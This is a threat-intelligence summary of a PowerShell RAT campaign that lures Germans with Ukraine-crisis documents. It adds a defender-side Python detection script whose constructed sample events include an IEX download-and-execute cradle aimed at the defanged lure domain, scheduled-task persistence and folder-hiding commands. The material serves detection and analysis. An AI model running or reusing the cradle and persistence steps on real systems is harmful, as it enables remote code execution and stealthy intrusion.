Custom PowerShell RAT targets Germans seeking information about the Ukraine crisis

Threat actors lure Germans with updates about the Ukraine crisis via a decoy Baden-Württemberg site, delivering a PowerShell-based RAT that can steal data and execute commands. The operation uses an AMSI bypass, creates a persistent scheduled task, and exfiltrates data to the German C2 domain kleinm.de.

Hashtags: #PowerShellRAT #BadenWuerttemberg #kleinm.de #GazpromGermina #collaboration-bw.de #UkraineCrisis

Keypoints

  • Threat actors used a domain tied to a German collaboration site to host a decoy lure mimicking the Baden-Württemberg official site.
  • The lure promotes a document named 2022-Q2-Bedrohungslage-Ukraine, offered via a prominent download button, which leads to a CHM file containing a PowerShell-based RAT.
  • Opening the CHM triggers a Base64-encoded command that, after de-obfuscation, downloads a script from the fake site and executes it with Invoke-Expression (IEX).
  • The downloaded script creates a folder called SecuriyHealthService and drops MonitorHealth.cmd and Status.txt; MonitorHealth.cmd is made persistent via a scheduled task.
  • Status.txt implements a PowerShell RAT with functions to download/upload files, load additional PS scripts, and execute commands, including an AMSI bypass to evade defenses.
  • The C2 domain used for exfiltration is kleinm.de, and attribution remains uncertain, though a Russian actor is hypothesized with weak supporting evidence.

MITRE Techniques

  • [T1059] Command and Scripting Interpreter – Runs a Base64-encoded PowerShell command that downloads a further script and executes it. Quote: ‘Executes PowerShell script to download and execute a script’
  • [T1105] Ingress Tool Transfer – The downloaded script is designed to fetch and run code from a remote server. Quote: ‘designed to execute a script downloaded from the fake Baden-Württemberg website, using Invoke-Expression (IEX).’
  • [T1053] Persistence – Scheduled Task/Job – Creates a daily scheduled task to run MonitorHealth.cmd. Quote: ‘Executes task scheduler to add MonitorHealth.cmd as a daily task’
  • [T1222] Defense Evasion – File and Directory Permissions Modification – Uses attrib.exe to hide the SecuriyHealthService folder. Quote: ‘Uses attrib.exe to hide SecuriyHealthService folder’
  • [T1562.001] Impair Defenses – Bypass AMSI – Bypasses the Windows Antimalware Scan Interface using an AES-encrypted function called bypass. Quote: ‘bypass the Windows Antimalware Scan Interface (AMSI) using an AES-encrypted function called bypass.’
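As an added defender-side example (not code from the Malwarebytes write-up or from the actor's tooling), the following Python maps the behaviours listed above to detections run over a small set of constructed, Sysmon-style telemetry records. It assumes the CHM is rendered by Windows HTML Help (hh.exe) so PowerShell shows up as its child, that the encoded command is passed via -EncodedCommand, and that task creation and folder hiding go through schtasks.exe and attrib.exe as the summary states; the record field names, sample file paths, the decoded one-liner (defanged domain, placeholder path) and the benign control events are all constructed.

```python
import base64
import re

# Indicators taken from the write-up above; everything else in this file is constructed.
C2_DOMAIN = "kleinm.de"
LURE_DOMAIN = "collaboration-bw.de"
DROP_FOLDER = "SecuriyHealthService"   # the malware's own misspelling, matched verbatim
TASK_PAYLOAD = "MonitorHealth.cmd"
KNOWN_HASHES = {
    "a5d8beaa832832576ca97809be4eee9441eb6907752a7e1f9a390b29bbb9fe1f": "Status.txt",
    "fc71522a4125ca4bdc5e5deca4a6498e7f2da4408614c2e1284c3ae8c083a5fd": "MonitorHealth.cmd",
}

# PowerShell accepts any unambiguous prefix of -EncodedCommand; longest alternative first.
ENC_RE = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
IEX_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)


def encode_command(text):
    """Encode text the way PowerShell expects for -EncodedCommand (UTF-16LE, Base64)."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the plaintext behind a -EncodedCommand argument, or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(events):
    """Map Sysmon-style records (constructed field names: event, image, parent_image,
    cmdline, query, sha256) to the techniques in the list above.
    Returns (technique, description, detail) tuples in event order."""
    findings = []
    for ev in events:
        kind = ev.get("event")
        if kind == "process":
            image = ev.get("image", "").lower()
            parent = ev.get("parent_image", "").lower()
            cmd = ev.get("cmdline", "")
            low = cmd.lower()
            # T1059: the CHM viewer (hh.exe) spawning PowerShell with an encoded command
            if image.endswith("powershell.exe") and parent.endswith("hh.exe"):
                decoded = decode_encoded_command(cmd)
                findings.append(("T1059", "hh.exe launched powershell.exe", decoded))
                # T1105: the decoded payload IEXes content fetched from the lure domain
                if (decoded and IEX_RE.search(decoded)
                        and LURE_DOMAIN in decoded.replace("[.]", ".").lower()):
                    findings.append(("T1105", "IEX download cradle from lure site", decoded))
            # T1053: a scheduled task whose action is MonitorHealth.cmd
            elif image.endswith("schtasks.exe") and "/create" in low and TASK_PAYLOAD.lower() in low:
                findings.append(("T1053", "scheduled task runs MonitorHealth.cmd", cmd))
            # T1222: attrib.exe setting the hidden attribute on the drop folder
            elif image.endswith("attrib.exe") and "+h" in low and DROP_FOLDER.lower() in low:
                findings.append(("T1222", "attrib +h on drop folder", cmd))
        elif kind == "dns":
            q = ev.get("query", "").lower().rstrip(".")
            if q == C2_DOMAIN or q.endswith("." + C2_DOMAIN):
                findings.append(("C2", "DNS lookup of C2 domain", q))
        elif kind == "file":
            h = ev.get("sha256", "").lower()
            if h in KNOWN_HASHES:
                findings.append(("IOC", "known dropped-file hash (" + KNOWN_HASHES[h] + ")", ev.get("path")))
    return findings


def build_sample_events():
    """Constructed telemetry mirroring the chain in the write-up, plus two benign controls.
    The decoded one-liner uses a defanged domain and a placeholder path, so it is inert."""
    ps = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    folder = r"C:\Users\victim\AppData\Roaming\SecuriyHealthService"
    cradle = "IEX ((New-Object Net.WebClient).DownloadString('http://collaboration-bw[.]de/<script-path>'))"
    return [
        {"event": "process", "image": r"C:\Windows\hh.exe", "parent_image": r"C:\Windows\explorer.exe",
         "cmdline": r'"C:\Windows\hh.exe" C:\Users\victim\Downloads\2022-Q2-Bedrohungslage-Ukraine.chm'},
        {"event": "process", "image": ps, "parent_image": r"C:\Windows\hh.exe",
         "cmdline": "powershell.exe -EncodedCommand " + encode_command(cradle)},
        {"event": "process", "image": r"C:\Windows\System32\schtasks.exe", "parent_image": ps,
         "cmdline": 'schtasks.exe /Create /SC DAILY /TN MonitorHealth /TR "' + folder + '\\MonitorHealth.cmd"'},
        {"event": "process", "image": r"C:\Windows\System32\attrib.exe", "parent_image": ps,
         "cmdline": 'attrib.exe +h "' + folder + '"'},
        {"event": "file", "path": folder + "\\Status.txt",
         "sha256": "a5d8beaa832832576ca97809be4eee9441eb6907752a7e1f9a390b29bbb9fe1f"},
        {"event": "dns", "query": "kleinm.de"},
        # benign controls: an admin's encoded one-liner launched from Explorer, and a normal backup task
        {"event": "process", "image": ps, "parent_image": r"C:\Windows\explorer.exe",
         "cmdline": "powershell.exe -enc " + encode_command("Get-Date")},
        {"event": "process", "image": r"C:\Windows\System32\schtasks.exe",
         "parent_image": r"C:\Windows\System32\cmd.exe",
         "cmdline": "schtasks.exe /Create /SC WEEKLY /TN Backup /TR C:\\Tools\\backup.cmd"},
    ]


if __name__ == "__main__":
    for technique, description, detail in analyse(build_sample_events()):
        print(technique, "|", description, "|", detail)
```

The parent/child pairing matters more than the individual commands: encoded PowerShell and schtasks /Create are common in administration, so the two benign control records produce no findings, while PowerShell spawned by the help viewer, a task pointing at MonitorHealth.cmd, and attrib +h on the misspelled folder each fire. Hash and domain matching is included for completeness, but the behavioural rules are what survive a rebuild of the payload.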

Indicators of Compromise

  • [Phishing Site] collaboration-bw[.]de/bedrohung-ukr.html – a compromised/decoy site hosting the lure.
  • [File name] 2022-Q2-Bedrohungslage-Ukraine.zip, 2022-Q2-Bedrohungslage-Ukraine.chm – lure delivery artifacts.
  • [Hash] Status.txt – a5d8beaa832832576ca97809be4eee9441eb6907752a7e1f9a390b29bbb9fe1f
  • [Hash] MonitorHealth.cmd – fc71522a4125ca4bdc5e5deca4a6498e7f2da4408614c2e1284c3ae8c083a5fd
  • [Domain] kleinm[.]de – C2 domain used for exfiltration.

Read more: https://blog.malwarebytes.com/threat-intelligence/2022/05/custom-powershell-rat-targets-germans-seeking-information-about-the-ukraine-crisis/